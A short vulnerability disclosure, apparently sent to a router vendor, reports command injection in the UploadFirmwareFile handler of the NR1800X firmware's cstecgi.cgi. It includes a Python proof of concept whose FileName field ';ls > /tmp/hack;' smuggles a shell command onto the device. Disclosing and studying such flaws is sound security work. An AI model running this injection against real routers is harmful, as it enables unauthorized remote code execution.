Hi, we found a command injection vulnerability at **NR1800X (**Firmware version V9.1.0u.6279_B20210910), and contact you at the first time.

The bug is in function UploadFirmwareFile of the file /cgi-bin/cstecgi.cgi which can control FileName to attack. FileName is directly copied to doSystem, result in command injection vulnerability.

Untitled

PoC

import requests url = "http://192.168.17.220:80/cgi-bin/cstecgi.cgi" cookie = {"Cookie":"uid=1234"} data = {'topicurl' : "UploadFirmwareFile", "FileName" : ";ls > /tmp/hack;"} response = requests.post(url, cookies=cookie, json=data) print(response.text) print(response)

Impact

Remote code execution

After execute the poc, we can see that /tmp/hack is created .

Untitled